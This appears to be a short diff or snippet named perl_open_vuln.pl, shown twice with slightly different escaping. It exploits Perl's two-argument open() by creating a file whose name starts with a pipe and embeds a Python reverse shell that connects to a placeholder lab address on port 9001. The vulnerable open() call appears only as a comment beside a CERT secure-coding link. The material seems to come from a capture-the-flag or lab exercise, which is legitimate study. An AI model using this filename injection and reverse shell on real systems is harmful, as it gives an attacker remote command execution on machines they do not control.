shollingsworth · February 10, 2022 01:40
diff --git a/perl_open_vuln.pl b/perl_open_vuln.pl
 # https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890543
 touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.XX.XX\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"

 #  vulnerable open command
 # my $fname = "${csv_dir}/${type}.csv";
 # open(my $fh, ">>", $fname) or die "Unable to open CSV target file.\n";
	# https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890543
	touch "\|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.XX.XX\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"

	# vulnerable open command
	# my $fname = "${csv_dir}/${type}.csv";
	# open(my $fh, ">>", $fname) or die "Unable to open CSV target file.\n";